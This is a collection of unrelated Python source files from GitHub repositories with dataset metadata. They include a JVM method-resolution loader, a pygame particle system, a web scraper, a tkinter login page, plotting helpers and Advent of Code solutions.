raise RuntimeError(f\"Too many fields: {len(self.fields)}\")\n\n self.cg = su.io.load(proj_data_dir / \"joint.cg.json\", clz=CallGraph)\n\n if self.indexed:\n # invalid lookup cache\n self.lookup_virtual_method.cache_clear()\n self.lookup_interface_method.cache_clear()\n self.lookup_special_method.cache_clear()\n self.lookup_static_method.cache_clear()\n self.lookup_field.cache_clear()\n\n self.iname2cid = {\n Insn.class_q2iname(cs.name): cs.id for cs in self.all_classes\n }\n self.cid2namedesc2mid = collections.defaultdict(dict)\n self.cid2name2fid = collections.defaultdict(dict)\n for cid in self.iname2cid.values():\n cs = self.get_class(cid)\n for mid in cs.methods:\n self.cid2namedesc2mid[cs.id][self.get_method(mid).namedesc] = mid\n for fid in cs.fields:\n self.cid2name2fid[cs.id][self.get_field(fid).name] = fid\n\n self.loaded_proj_data_dir = proj_data_dir\n return True\n\n def lookup_class(self, name: str) -> int:\n try:\n return self.iname2cid[name]\n except KeyError:\n raise ClassResolutionException(\"ClassNotFoundError\")\n\n def lookup_method(self, cid: int, namedesc: str, op: str) -> int:\n if op == Consts.op_invokevirtual:\n return self.lookup_virtual_method(cid, namedesc)\n elif op == Consts.op_invokespecial:\n return self.lookup_special_method(cid, namedesc)\n elif op == Consts.op_invokestatic:\n return self.lookup_static_method(cid, namedesc)\n elif op == Consts.op_invokeinterface:\n return self.lookup_interface_method(cid, namedesc)\n else:\n raise MethodResolutionException(f\"Unknown op: {op}\")\n\n @functools.lru_cache(maxsize=10240)\n def lookup_virtual_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf section 5.4.3.3\n \"\"\"\n cs = self.get_class(cid)\n\n # 1. if C is an interface, method resolution throws an IncompatibleClassChangeError.\n if cs.is_interface():\n raise MethodResolutionException(\"IncompatibleClassChangeError\")\n\n # 2. Otherwise, method resolution attempts to locate the referenced method in C and its superclasses:\n\n # 2.1. [IGNORED] If C declares exactly one method with the name specified by the method reference, and the declaration is a signature polymorphic method (§2.9), then method lookup succeeds. All the class names mentioned in the descriptor are resolved (§5.4.3.1).\n\n # 2.2. Otherwise, if C declares a method with the name and descriptor specified by the method reference, method lookup succeeds.\n mid = self.cid2namedesc2mid[cid].get(namedesc, -2)\n\n # 2.3. Otherwise, if C has a superclass, step 2 of method resolution is recursively invoked on the direct superclass of C\n if mid < 0:\n super_cid = cs.ext\n while super_cid > 0:\n super_cs = self.get_class(super_cid)\n mid = self.cid2namedesc2mid.get(super_cid, {}).get(namedesc, -2)\n if mid >= 0:\n break\n super_cid = super_cs.ext\n\n # 3. 
Otherwise, method resolution attempts to locate the referenced method in the superinterfaces of the specified class C:\n if mid < 0:\n # 3.1 If the maximally-specific superinterface methods of C for the name and descriptor specified by the method reference include exactly one method that does not have its ACC_ABSTRACT flag set, then this method is chosen and method lookup succeeds.\n # 3.2 Otherwise, if any superinterface of C declares a method with the name and descriptor specified by the method reference that has neither its ACC_PRIVATE flag nor its ACC_STATIC flag set, one of these is arbitrarily chosen and method lookup succeeds.\n interface_queue = []\n interface_visited = set()\n potential_mids = []\n\n # perform a breath-first search to find all superinterfaces\n interface_queue += cs.impl\n while len(interface_queue) > 0:\n interface_cid = interface_queue.pop(0)\n if interface_cid in interface_visited or interface_cid < 0:\n continue\n interface_visited.add(interface_cid)\n\n potential_mid = self.cid2namedesc2mid.get(interface_cid, {}).get(\n namedesc, -2\n )\n if potential_mid >= 0:\n potential_ms = self.get_method(potential_mid)\n if potential_ms.is_private() or potential_ms.is_static():\n pass\n if potential_ms.is_abstract():\n potential_mids.append(potential_mid)\n else:\n # found a non-abstract method in the maximally-specific superinterface\n mid = potential_mid\n break\n\n interface_queue += self.get_class(interface_cid).impl\n\n if len(potential_mids) > 0:\n # randomly choose one\n mid = potential_mids[0]\n\n if mid < 0:\n raise MethodResolutionException(\"NoSuchMethodError\")\n\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_interface_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf section 5.4.3.4\n \"\"\"\n cs = self.get_class(cid)\n\n # 1. If C is not an interface, interface method resolution throws an IncompatibleClassChangeError.\n if not cs.is_interface():\n raise MethodResolutionException(\"IncompatibleClassChangeError\")\n\n # 2. Otherwise, if C declares a method with the name and descriptor specified by the interface method reference, method lookup succeeds.\n mid = self.cid2namedesc2mid[cid].get(namedesc, -2)\n\n # 3. Otherwise, if the class Object declares a method with the name and descriptor specified by the interface method reference, which has its ACC_PUBLIC flag set and does not have its ACC_STATIC flag set, method lookup succeeds.\n if mid < 0:\n object_cid = self.iname2cid[\"java/lang/Object\"]\n potential_mid = self.cid2namedesc2mid[object_cid].get(namedesc, -2)\n if potential_mid >= 0:\n potential_ms = self.get_method(potential_mid)\n if not potential_ms.is_static() and potential_ms.is_public():\n mid = potential_mid\n\n # 4. Otherwise, if the maximally-specific superinterface methods (§5.4.3.3) of C for the name and descriptor specified by the method reference include exactly one method that does not have its ACC_ABSTRACT flag set, then this method is chosen and method lookup succeeds.\n # 5. 
Otherwise, if any superinterface of C declares a method with the name and descriptor specified by the method reference that has neither its ACC_PRIVATE flag nor its ACC_STATIC flag set, one of these is arbitrarily chosen and method lookup succeeds.\n if mid < 0:\n interface_queue = []\n interface_visited = set()\n potential_mids = []\n\n # perform a breath-first search to find all superinterfaces\n interface_queue += cs.impl\n while len(interface_queue) > 0:\n interface_cid = interface_queue.pop(0)\n if interface_cid in interface_visited or interface_cid < 0:\n continue\n interface_visited.add(interface_cid)\n\n potential_mid = self.cid2namedesc2mid.get(interface_cid, {}).get(\n namedesc, -2\n )\n if potential_mid >= 0:\n potential_ms = self.get_method(potential_mid)\n if potential_ms.is_private() or potential_ms.is_static():\n pass\n if potential_ms.is_abstract():\n potential_mids.append(potential_mid)\n else:\n # found a non-abstract method in the maximally-specific superinterface\n mid = potential_mid\n break\n\n interface_queue += self.get_class(interface_cid).impl\n\n if len(potential_mids) > 0:\n # randomly choose one\n mid = potential_mids[0]\n\n if mid < 0:\n raise MethodResolutionException(\"NoSuchMethodError\")\n\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_special_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n first try virtual, then try interface\n \"\"\"\n try:\n mid = self.lookup_virtual_method(cid, namedesc)\n except MethodResolutionException:\n mid = self.lookup_interface_method(cid, namedesc)\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_static_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n find the exact method in cid, no overriding\n \"\"\"\n mid = self.cid2namedesc2mid[cid].get(namedesc, -2)\n if mid < 0:\n raise MethodResolutionException(\"NoSuchMethodError\")\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_field(self, cid: int, name: str) -> int:\n \"\"\"\n https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf section 5.4.3.2\n \"\"\"\n cs = self.get_class(cid)\n\n # 1. If C declares a field with the name and descriptor specified by the field reference, field lookup succeeds. The declared field is the result of the field lookup.\n fid = self.cid2name2fid[cid].get(name, -2)\n\n # 2. Otherwise, field lookup is applied recursively to the direct superinterfaces of the specified class or interface C.\n if fid < 0:\n for interface_cid in cs.impl:\n if interface_cid < 0:\n continue\n fid = self.cid2name2fid[interface_cid].get(name, -2)\n if fid >= 0:\n break\n\n # 3. Otherwise, if C has a superclass S, field lookup is applied recursively to S.\n if fid < 0:\n super_cid = cs.ext\n if super_cid >= 0:\n fid = self.lookup_field(super_cid, name)\n\n # 4. 
Otherwise, field lookup fails.\n if fid < 0:\n raise FieldResolutionException(\"NoSuchFieldError\")\n\n return fid\n","repo_name":"EngineeringSoftware/teco","sub_path":"python/teco/data/raw_data_loader.py","file_name":"raw_data_loader.py","file_ext":"py","file_size_in_byte":15227,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"82"} +{"seq_id":"73592436428","text":"import argparse\nimport os\nfrom segment_anything import sam_model_registry, SamPredictor\nfrom logging import getLogger\nfrom libtiff import TIFF\nimport numpy as np\n\nlogger = getLogger(__name__)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Run model prediction on an image\")\n parser.add_argument(\"--input_data_file\", type=str, help=\"Input file path\",\n default='/data/purple_box/'\n 'FKP4_L57D855P1_topro_purplebox_x200y1400z0530.tif')\n parser.add_argument(\"--output_data_base_name\", type=str,\n help=\"Output file path with base file name with slice number appended at run time\",\n default='/data/purple_box/embedding/slice.npy')\n parser.add_argument(\"--model_file\", type=str, default='/data/model/sam_vit_h_4b8939.pth',\n help=\"path for the model to load for inference\")\n\n args = parser.parse_args()\n input_data_file = args.input_data_file\n output_data_base_name = args.output_data_base_name\n model_file = args.model_file\n\n # load model\n model_type = \"vit_h\"\n sam = sam_model_registry[model_type](checkpoint=model_file)\n sam.to(device='cuda')\n\n # load input tiff image into numpy array in RGB format\n tif = TIFF.open(input_data_file)\n images = []\n for image in tif.iter_images():\n images.append(image)\n\n # generate masks for the entire image\n predictor = SamPredictor(sam)\n output = {}\n slice_no = 0\n for im in images:\n # cast image down from 16 bits to 8 bits\n image = im.astype(\"uint8\")\n # convert image to RGB by replicating each intensity into RGB components added as the third axis\n image_rgb = image[:, :, np.newaxis].repeat(3, axis=2)\n # masks is a list of dicts containing all segmented masks for the image slice\n predictor.set_image(image_rgb)\n image_embedding = predictor.get_image_embedding().cpu().numpy()\n print(f'{slice_no}: {image_embedding.shape}')\n base_name, ext_name = os.path.splitext(output_data_base_name)\n output_file_name = f'{base_name}_{slice_no}{ext_name}'\n np.save(output_file_name, image_embedding)\n slice_no += 1\n","repo_name":"RENCI/sam-serve","sub_path":"src/cli_predict.py","file_name":"cli_predict.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70529358351","text":"import pygame\nimport math\nimport sys\nimport random\n\ndef create_guassian(width, height, sigma=1, color=pygame.Vector3(1, 1, 1)):\n \n surf = pygame.surface.Surface((int(width), int(height))).convert_alpha()\n for y in range(width):\n for x in range(height):\n r2 = (x - width/2)**2 + (y - height/2)**2\n g = math.exp(-0.5*r2/(sigma**2))\n c = color.copy()\n # a = g\n a = g/5\n c *= 255\n \n surf.set_at((x, y), (int(c.x), int(c.y), int(c.z), int(a*255)))\n \n return surf\n\nclass Particle:\n\n def __init__(self, pos, size, lifetime, velocity, surf, parent_system):\n self.pos = pos\n self.lifetime = lifetime\n self.age = 0\n self.size = size\n self.velocity = velocity\n self.parent_system = parent_system\n\n self.surf = surf\n\n # randomize the lifetime and the velocity a bit\n t = random.random()\n self.lifetime = 
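self.lifetime*(1 - t) + t*(self.lifetime + self.lifetime*0.5)\n        # the blend above collapses to lifetime *= (1 + 0.5*t),\n        # i.e. a random stretch of up to +50% for t in [0, 1)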
\n\n        t = random.random()\n        self.velocity = self.velocity*(1 - t) + t*(self.velocity + self.velocity*0.1)\n    \n    def update(self, delta):\n        self.pos += delta*self.velocity\n        self.age += delta\n        if self.age >= self.lifetime:\n            self.parent_system.remove_particle(self)\n        \n        t = self.age/self.lifetime\n        self.surf.set_alpha(int(255*(1 - t)))\n\n    def draw(self):\n        surf = pygame.display.get_surface()\n        surf.blit(self.surf, (int(self.pos.x - self.size.x/2), int(self.pos.y - self.size.y/2)))\n\nclass ParticleSystem:\n\n    def __init__(self, n, pos, lifetime=1, color=pygame.Vector3(0, 0, 0)):\n        self.n = n\n        self.e_t = 1/n\n        self.t = 0\n        self.particles = []\n        self.pos = pos\n        self.g_surf = create_guassian(50, 50, sigma=6, color=color)\n        self.lifetime = lifetime\n\n    def emit(self, delta):\n        self.t += delta\n        \n        while self.t > self.e_t:\n            new_particle = Particle(\n                pos=pygame.Vector2(self.pos),  # copy into a Vector2 so particle motion never mutates the emitter position\n                size=pygame.Vector2(50, 50),\n                lifetime=self.lifetime,\n                velocity=100*pygame.Vector2(0.3*(random.random() - random.random()), -1).normalize(),\n                surf=self.g_surf,\n                parent_system=self)\n            self.particles.append(new_particle)\n            self.t -= self.e_t\n\n    \n    def update(self, delta):\n        self.emit(delta)\n        for particle in self.particles:\n            particle.update(delta)\n\n    def draw(self):\n        for particle in self.particles:\n            particle.draw()\n    \n    def remove_particle(self, particle):\n        i = self.particles.index(particle)\n        del self.particles[i]\n\ndef main():\n\n    pygame.init()\n\n    screen = pygame.display.set_mode((800, 600))\n    pygame.display.set_caption(\"Particle System\")\n\n    particle_system_1 = ParticleSystem(100, [100, 300])\n    particle_system_2 = ParticleSystem(100, [200, 300], color=pygame.Vector3(.9, 0.3, 0))\n    particle_system_3 = ParticleSystem(100, [300, 300], color=pygame.Vector3(0, 0, 1))\n    particle_system_4 = ParticleSystem(100, [400, 300], color=pygame.Vector3(0, 1, 0))\n\n    clock = pygame.time.Clock()\n    delta = 0\n    times = 0\n    while True:\n        clock.tick()\n        fps = clock.get_fps()\n        if times%50 == 0:\n            print(f\"fps: {fps}\")\n        times += 1\n        if fps:\n            delta = 1/fps\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                sys.exit()\n\n        particle_system_1.update(delta)\n        particle_system_2.update(delta)\n        particle_system_3.update(delta)\n        particle_system_4.update(delta)\n        \n        screen.fill((100, 100, 100))\n        particle_system_1.draw()\n        particle_system_2.draw()\n        particle_system_3.draw()\n        particle_system_4.draw()\n        pygame.display.update()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"ReubenKabiti/smoke-particle-system-pygame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"37286740411","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nclass SA():\n    def get_div(self, user):\n        league = user + '#leagues'\n        doc = requests.get(league).text\n        soup = BeautifulSoup(doc, 'lxml')\n        \n        teams = soup.find_all(class_='list-group list-group-flush mb-4')\n        teams = soup.find_all(class_='row ml-0') if not teams else teams\n        newest_team = \"\"\n        for team in teams:\n            if 'ultiduo' not in team.text.strip().lower():\n                newest_team = team.text.strip()\n                break\n        \n        try:\n            league = re.findall(r' in (.*?) on ', newest_team)[0]\n        except IndexError:\n            try:\n                league = re.findall(r' in (.*?) 
for ', newest_team)[0]\n except IndexError:\n league = \"\"\n new_league = self.convert_to_season_rank(league)\n return new_league\n \n def convert_to_season_rank(self, league):\n divs = ['Elite', 'Central', 'Acesso', 'Aberta', 'Iniciante']\n div = [x for x in divs if x.lower() in league.lower()]\n\n try:\n return ['FBTF - ' + div[0] + ' ' + \"6's\"]\n except IndexError:\n return ['FBTF - ' + 'Iniciante' + ' ' + \"6's\"]\n","repo_name":"Astatham98/Rahbot","sub_path":"divgetters/sa_player_id_get.py","file_name":"sa_player_id_get.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"18710063092","text":"from pymor.basic import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\ndef fom_objective_functional(fom, mu):\n \"\"\" This method evaluates the full order model (FOM) at the given parameter |mu|.\n\n Parameters\n ----------\n fom\n The FOM that gets evaluated.\n mu \n The parameter for which the FOM is evaluated.\n\n Returns \n -------\n value_FOM\n The value od the FOM at the parameter |mu|.\n \"\"\"\n value_FOM = fom.output(mu)[0,0]\n return value_FOM\n\ndef compute_value_matrix(fom, f, x, y):\n \"\"\"\n Computes the value of the |fom| at the given coordinates |x| and |y|. \n\n Parameters\n fom \n The FOM that gets evaluated.\n f \n The function that gets called.\n x\n |x| coordinates of the evaluation.\n y\n |y| coordinates of the evaluation.\n\n Returns \n -------\n xx \n meshgrid of x and y.\n yy \n meshgrid of x and y.\n f_of_x \n The evaluation of the function |f|.\n\n \"\"\"\n f_of_x = np.zeros((len(x), len(y)))\n for ii in range(len(x)):\n for jj in range(len(y)):\n f_of_x[ii][jj] = f(fom, (x[ii], y[jj]))\n xx, yy = np.meshgrid(x, y)\n return xx, yy, f_of_x\n\n\ndef plot_3d_surface(fom, f, x, y, alpha=1):\n \"\"\" plots the function f as a 3D plot with contour lines. 
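For example (hypothetical call; the pyMOR |fom| is constructed elsewhere):\n\n        plot_3d_surface(fom, fom_objective_functional,\n                        np.linspace(0, 3.2, 15), np.linspace(0, 3.2, 15))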
\n\n    Parameters \n    ----------\n    fom \n        The |fom| corresponding to the function |f|.\n    f \n        The function that gets plotted.\n    x \n        1D sample points for the first parameter axis (meshed below).\n    y \n        1D sample points for the second parameter axis (meshed below).\n    alpha \n        fill density of the plot.\n    \"\"\"\n    mpl.rcParams['figure.figsize'] = (12.0, 8.0)\n    mpl.rcParams['font.size'] = 12\n    mpl.rcParams['savefig.dpi'] = 300\n    mpl.rcParams['figure.subplot.bottom'] = .1\n    mpl.rcParams['axes.facecolor'] = (0.0, 0.0, 0.0, 0.0)\n\n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='3d')\n    x, y, f_of_x = compute_value_matrix(fom, f, x, y)\n    ax.contour(x,y,f_of_x, levels=10, zdir='z', offset=1)\n    ax.plot_surface(x, y, f_of_x, cmap='Blues',\n                    linewidth=0, antialiased=False, alpha=alpha)\n    \n    ax.view_init(elev=27.7597402597, azim=-39.6370967742)\n    ax.set_xlim3d([-0.10457963, 3.2961723])\n    ax.set_ylim3d([-0.10457963, 3.29617229])\n    ax.set_zlim3d([1,10])\n    ax.set_ylabel(r'$\\mu_1$')\n    ax.set_xlabel(r'$\\mu_2$')\n    plt.show(block=True)","repo_name":"ullmannsven/Bachelorarbeit","sub_path":"2D_PDE_optimization_problem/contour_plot_objective_function.py","file_name":"contour_plot_objective_function.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"6035140866","text":"\"\"\"\nGroup By\n\"\"\"\nfrom itertools import groupby, tee\n\nalunos = [\n    {'nome': 'Luiz', 'nota':'A'},\n    {'nome': 'Daniel', 'nota':'B'},\n    {'nome': 'Maria', 'nota':'C'},\n    {'nome': 'Bruno', 'nota':'D'},\n    {'nome': 'Carlos', 'nota':'E'},\n    {'nome': 'Jessica', 'nota':'F'},\n    {'nome': 'Lucas', 'nota':'B'},\n    {'nome': 'Anderson', 'nota':'C'},\n    {'nome': 'José', 'nota':'A'}\n]\n\n# Lambda used as the sort key (orders the dicts by grade)\nordena = lambda item: item['nota']\n\n\n# Sort the students by grade (groupby expects sorted input)\nalunos.sort(key=ordena)\n\n# Sanity check of the ordering\n# for aluno in alunos:\n#     print(aluno)\n\n\nalunosAgrupados = groupby(alunos, ordena)\n\nfor agrupamento, valoresAgrupados in alunosAgrupados:\n    va1, va2 = tee(valoresAgrupados)\n\n    print(f'Group {agrupamento}')\n\n    for aluno in va1:\n        print(f'\\t{aluno[\"nome\"]}')\n\n    quantidade = len(list(va2))\n    print(f'\\t{quantidade} students got grade {agrupamento}')\n    print()\n","repo_name":"Daniel-Silva97/Python-Basico-Ao-Avancado","sub_path":"1 - pythonModuloBasico/funcoesUteis/groupBy/groupBy.py","file_name":"groupBy.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"40110387761","text":"from oslo_versionedobjects import fields\n\nfrom DSpace import db\nfrom DSpace import exception\nfrom DSpace import objects\nfrom DSpace.objects import base\n\n\n@base.StorObjectRegistry.register\nclass AlertGroup(base.StorPersistentObject, base.StorObject,\n                 base.StorObjectDictCompat, base.StorComparableObject):\n\n    fields = {\n        'id': fields.IntegerField(),\n        'name': fields.StringField(),\n        'alert_rule_ids': fields.ListOfIntegersField(nullable=True),\n        'email_group_ids': fields.ListOfIntegersField(nullable=True),\n        'cluster_id': fields.UUIDField(),\n        'alert_rules': fields.ListOfObjectsField('AlertRule', nullable=True),\n        'email_groups': fields.ListOfObjectsField('EmailGroup', nullable=True)\n    }\n\n    OPTIONAL_FIELDS = ('alert_rules', 'email_groups')\n\n    def create(self):\n        if self.obj_attr_is_set('id'):\n            raise exception.ObjectActionError(action='create',\n                                              reason='already created')\n        updates = self.stor_obj_get_changes()\n\n        db_cluster = 
db.alert_group_create(self._context, updates)\n self._from_db_object(self._context, self, db_cluster)\n\n def save(self):\n updates = self.stor_obj_get_changes()\n if updates:\n db.alert_group_update(self._context, self.id, updates)\n\n self.obj_reset_changes()\n\n def destroy(self):\n updated_values = db.alert_group_destroy(self._context, self.id)\n self.update(updated_values)\n self.obj_reset_changes(updated_values.keys())\n\n @classmethod\n def _from_db_object(cls, context, obj, db_obj, expected_attrs=None):\n expected_attrs = expected_attrs or []\n\n if 'alert_rules' in expected_attrs:\n alert_rules = db_obj.get('alert_rules', [])\n obj.alert_rules = [objects.AlertRule._from_db_object(\n context, objects.AlertRule(context), alert_rule\n ) for alert_rule in alert_rules]\n\n if 'email_groups' in expected_attrs:\n email_groups = db_obj.get('email_groups', [])\n obj.email_groups = [objects.EmailGroup._from_db_object(\n context, objects.EmailGroup(context), email_group\n ) for email_group in email_groups]\n\n return super(AlertGroup, cls)._from_db_object(context, obj, db_obj)\n\n\n@base.StorObjectRegistry.register\nclass AlertGroupList(base.ObjectListBase, base.StorObject):\n\n fields = {\n 'objects': fields.ListOfObjectsField('AlertGroup'),\n }\n\n @classmethod\n def get_all(cls, context, filters=None, marker=None, limit=None,\n offset=None, sort_keys=None, sort_dirs=None,\n expected_attrs=None):\n alert_groups = db.alert_group_get_all(context, marker, limit,\n sort_keys, sort_dirs, filters,\n offset, expected_attrs)\n return base.obj_make_list(context, cls(context), objects.AlertGroup,\n alert_groups, expected_attrs=expected_attrs)\n\n @classmethod\n def get_count(cls, context, filters=None):\n count = db.alert_group_get_count(context, filters)\n return count\n","repo_name":"yalezhangk/ceph_storage","sub_path":"DSpace/objects/alert_group.py","file_name":"alert_group.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15945181727","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\ndef nextPage():\r\n ws.destroy()\r\n import Email\r\n\r\nf = ('Times', 14,)\r\n\r\n\r\ncon = sqlite3.connect('userdata.db')\r\ncur = con.cursor()\r\ncur.execute('''CREATE TABLE IF NOT EXISTS record(\r\n name text, \r\n email text, \r\n contact number, \r\n gender text, \r\n country text,\r\n password text\r\n )\r\n ''')\r\ncon.commit()\r\n\r\n \r\n\r\nws = Tk()\r\nws.title('Login Page')\r\nws.geometry('400x300')\r\nws.config(bg='#000000')\r\nws.iconbitmap('images.png')\r\n \r\n\r\ndef login_response():\r\n try:\r\n con = sqlite3.connect('userdata.db')\r\n c = con.cursor()\r\n for row in c.execute(\"Select * from record\"):\r\n username = row[1]\r\n pwd = row[5]\r\n \r\n except Exception as ep:\r\n messagebox.showerror('', ep)\r\n\r\n uname = email_tf.get()\r\n upwd = pwd_tf.get()\r\n check_counter=0\r\n if uname == \"\":\r\n warn = \"Username can't be empty\"\r\n else:\r\n check_counter += 1\r\n if upwd == \"\":\r\n warn = \"Password can't be empty\"\r\n else:\r\n check_counter += 1\r\n if check_counter == 2:\r\n if (uname == username and upwd == pwd):\r\n messagebox.showinfo('Login Status', 'Logged in Successfully!')\r\n \r\n else:\r\n messagebox.showerror('Login Status', 'invalid username or password')\r\n else:\r\n messagebox.showerror('', warn)\r\n\r\n#Variables \r\nvar = StringVar()\r\nvar.set('male')\r\n\r\ncountries = []\r\nvariable = StringVar()\r\nworld = 
open('countries.txt', 'r')\r\nfor country in world:\r\n country = country.rstrip('\\n')\r\n countries.append(country)\r\nvariable.set(countries[22])\r\n\r\n# widgets\r\nexit_button = Button(ws, text=\"Exit\", command=ws.destroy,bg='#FF0000')\r\nexit_button.pack(pady=0,padx=0)\r\n\r\nleft_frame = Frame(\r\n ws, \r\n bd=2, \r\n bg='#000000', \r\n relief=SOLID, \r\n padx=10, \r\n pady=10, \r\n borderwidth = 0\r\n )\r\n\r\nLabel(\r\n left_frame, \r\n text=\"Enter Email\",\r\n borderwidth = 0, \r\n bg='#000000',fg='#b8860b',\r\n font=f).grid(row=0, column=0, sticky=W, pady=10)\r\n\r\nLabel(\r\n left_frame, \r\n text=\"Enter Password\", \r\n bg='#000000',\r\n font=f,fg='#b8860b'\r\n ).grid(row=1, column=0, pady=10)\r\n\r\nemail_tf = Entry(\r\n left_frame, \r\n font=f,\r\n bd=1,bg='#f8f8ff'\r\n )\r\npwd_tf = Entry(\r\n left_frame, \r\n font=f,\r\n show='*',\r\n bd=1,bg='#f8f8ff'\r\n )\r\nlogin_btn = Button(\r\n left_frame, \r\n width=15, \r\n text='Login', \r\n font=f, \r\n relief=SOLID,\r\n cursor='hand2',\r\n command=nextPage,\r\n bd=0,\r\n bg='#000000',fg='#b8860b'\r\n )\r\n\r\ntransporter = Button(\r\n left_frame,\r\n width=15, \r\n text='Login', \r\n font=f, \r\n relief=SOLID,\r\n command=nextPage,\r\n bd=0,\r\n bg='#000000',fg='#b8860b'\r\n)\r\n\r\n\r\n\r\n\r\n# widgets placement\r\nemail_tf.grid(row=0, column=1, pady=10, padx=20)\r\npwd_tf.grid(row=1, column=1, pady=10, padx=20)\r\nlogin_btn.grid(row=2, column=1, pady=10, padx=20)\r\nleft_frame.place(relx=0.5, rely=0.5, anchor=CENTER)\r\nexit_button.place(x=0,y=0)\r\n\r\n\r\n# infinite loop\r\nws.mainloop()","repo_name":"KeeganG12/Tkinter-Project","sub_path":"Tkinter Project/login2.py","file_name":"login2.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72906727632","text":"import os\nclass Answers:\n def __init__(self, partOne: int = 0, partTwo: int = 0) -> None:\n self.__partOne = partOne\n self.__partTwo = partTwo\n\n @property\n def partOne(self):\n return self.__partOne\n\n @property\n def partTwo(self):\n return self.__partTwo\n\nfrom itertools import islice\n\ndef window(seq, n=4):\n \"Returns a sliding window (of width n) over data from the iterable\"\n \" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... 
\"\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result\n\n\ndef readFile(filepath):\n with open(os.path.join(os.path.dirname(__file__), filepath)) as file:\n line = file.readline()\n while line:\n yield line.rstrip(\"\\n\")\n line = file.readline()\n\n\ndef solutionOne(fileName: str):\n result = 0\n number_of_characters = 4\n for line in readFile(f\"{fileName}.txt\"):\n for index, chars in enumerate(window(line, number_of_characters)):\n charset = set(chars)\n if len(charset) == len(chars):\n result = index+number_of_characters\n break\n return result\n\n\ndef solutionTwo(fileName: str):\n result = 0\n number_of_characters = 14\n for line in readFile(f\"{fileName}.txt\"):\n for index, chars in enumerate(window(line, number_of_characters)):\n charset = set(chars)\n if len(charset) == len(chars):\n result = index+number_of_characters\n break\n return result\n\n\nif __name__ == \"__main__\":\n answer = Answers(5, 23)\n assert solutionOne(\"test\") == answer.partOne\n print(\"Part One: \", solutionOne(\"input\"))\n assert solutionTwo(\"test\") == answer.partTwo\n print(\"Part Two: \", solutionTwo(\"input\"))\n","repo_name":"damien-deathstalker/Advent-of-Code","sub_path":"2022/Day 06/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42432280015","text":"from util import *\n\n\n@apply\ndef apply(contains):\n x, domain = contains.of(Element)\n assert domain in Interval(0, S.Pi, left_open=True, right_open=True)\n return Greater(sin(x), 0)\n\n\n@prove(proved=False)\ndef prove(Eq):\n from axiom import geometry\n\n x = Symbol(real=True)\n Eq << apply(Element(x, Interval(0, S.Pi, left_open=True, right_open=True)))\n\n Eq << geometry.sin.to.sum.apply(sin(x))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n run()\n# created on 2020-11-19\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/geometry/el/imply/sin_gt_zero.py","file_name":"sin_gt_zero.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"13384255992","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\"\"\"\nLogging.\n\nScript to log items to a log file.\n\"\"\"\nimport logging\n\n\ndef doc(t, m):\n \"\"\"\n Document a log entry to the log file.\n\n :param t: Type of log entry to record. 
